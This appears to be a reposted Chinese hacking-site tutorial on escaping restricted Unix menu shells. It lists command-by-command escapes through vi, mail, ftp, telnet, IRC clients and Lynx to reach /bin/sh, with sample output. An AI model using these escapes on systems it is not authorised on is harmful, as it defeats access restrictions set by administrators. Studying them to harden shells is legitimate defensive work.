主页 PC知识 网管技术 黑客帝国 安全技术 开放系统 程序设计 搜索 技术论坛

 

相关联接
 
RHU本级分类

新手入门
入侵实例
工具使用
安全防范
黑客人物
软件破解
漏洞研究

 
RHU阅读排行
·Serv-u6.0提权新招
·CGI漏洞攻击手册version-0.02
·如何突破一个有限制的SHELL
·DEBUG命令大全
·在肉鸡上安装隐蔽的ftp服务器
·穿透防火墙的数据传输方法(附源码)
·mssql注射时不可以多次echo的解决办法
·入侵检测实战之全面问答
·黑客入侵检测实战问答篇
·用dos命令破解远程NT用户密码

 
 
RHU最新文章
·IPC经典入侵,比3389实用(图)
·安全基础知识 细说暴库的原理与方法
·SQL注入一日通
·手动克隆管理员技巧
·骇客学堂:入侵后自保 3389下擦除日志
·解决Telnet入侵在FTP空间存放木马
·骇客学堂:教你穿透ADSL路由入侵内网
·骇客学堂:总结各个网络端口的入侵
·骇客学堂:注入点得知是否有硬盘访问权
·骇客学堂:带注释手动注入脚本命令整理

 
 
RHU相关搜索









 
 
RHU广而告之

 
 
>您的位置:首页 -> 黑客帝国-> 新手入门
如何突破一个有限制的SHELL

作者:RHU-TAC编辑员 来自:RHU网络采集 时间:2005-5-12 双击滚屏 收藏本页 字体:


点击 查看RHU2004全年文章


在菜单中得到SHELL用户(UNIX)?

1.1有权使用 "vi" 程序(来自ALT.2600问题解答)
VI是一个强有力的文本编辑器,你可能有机会使用。你就有可能得到一个SHELL。
在VI状态下输入以下命令:

:shell=/bin/sh
然后再运行SHELL这个命令:
:shell

注释: 如果你的SHELL被限制运行 " CD "命令,那么请使用FTP来得到,这就可以了。


有权使用 "mail" 程序

如果你有权利使用 "mail" 程序来写信请按照下面一步步做:
在菜单选项上运行"mail"程序。

实例:
1.Email (mail) <--------选择这一项到
Email No mail for user1.....
(他会自动地返回选项菜单)

所以在此之前,你要写一封信给你自己

1.Email (mail) <--------选择这一项到
Email Mail version ?. Type ? for help.
"/var/spool/mail/user1": 1 messages

> 1 ck@my.host.edu Thu Sep 1 1:11 1/99 "test"
&

Ok,现在我们停留在 mail 的 "&" 提示符下,那么现在只需要输入以下命令:
&!/bin/sh[回车]
$ <------------ 终于不用再见到那该死的菜单了 ^_^

注释: 许多程序里字符 "!" 可以直接制定和运行一个 SHELL 命令,在合式的一个场合中 你可以运行 "/bin/sh" 去得到一个 shell。


FTP and Telnet FTP and Telnet 他们同样有能力在提示符下运用字符 "!" 来执行命令:

ftp> !ps <-------- !(command)
PID TT STAT TIME COMMAND
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps

telnet>!ps
PID TT STAT TIME COMMAND
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps

在一些用户的初始配置文件里,并不会为你配置所有命令的绝对路径,那么当你要运行一个程序 时,如果你的配置文件里路径查找不到它将不会执行。这个时候你就要输入这个程序的绝对路 径了。

实例:
ftp> !/usr/bin/ps
PID TT STAT TIME COMMAND
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps

ftp> !/usr/bin/ps
PID TT STAT TIME COMMAND
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps

注释:无论何时都要设法执行 !/bin/sh

注释: WIN95/98 AND NT:

ftp>!command.com Microsoft
Microsoft Windows NT DOS
Copyright Microsoft Corp 1990-1996.

C:\>


IRC

如果有限制的 SHELL 菜单里可以运行执行 IRC client (Internet Relay Chat)
当在登录的时候,你可以执行任何命令
/EXEC (command)


Lynx 可以使用以下命令 lynxexec and lynxprog:

实例:
lynxexec:ls -l
lynxprog:news
lynxexec:/bin/sh

实例: lynx lynxexec://localhost/finger

OVER

[1] 页 RedHyphone.Union 投稿邮箱
[特别声明]:
本站文章大多搜索转载自网络中,如果侵犯了您的权利,请告之我们。本站将立即删除。
本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。
查看评论】【向上滚屏】【关闭窗口】【 打印
-相关文章
  • [笔记本]全球首款四核NB实战
  • 购买Mac电脑常见问题解答
  • J2EE应用:Java eetutorial5运行总结
  • 以太网端口类型和可插拔模块揭秘
  • 详细解说iexplore.exe是进程还是病毒
  • -文章评论 (关闭)
    ·还没有相关的评论!

    网上大名:
    红旋风网络技术联盟 RHUTech.Union
     
    Copyright © 2000-2007 RedHyphone.Union All Rights Reserved. 红旋风联盟版权所有.皖ICP备05011033号
    中国红旋风网络技术联盟 | www.RedHyphone.net
    Mailto:Redhyphone@gamil.com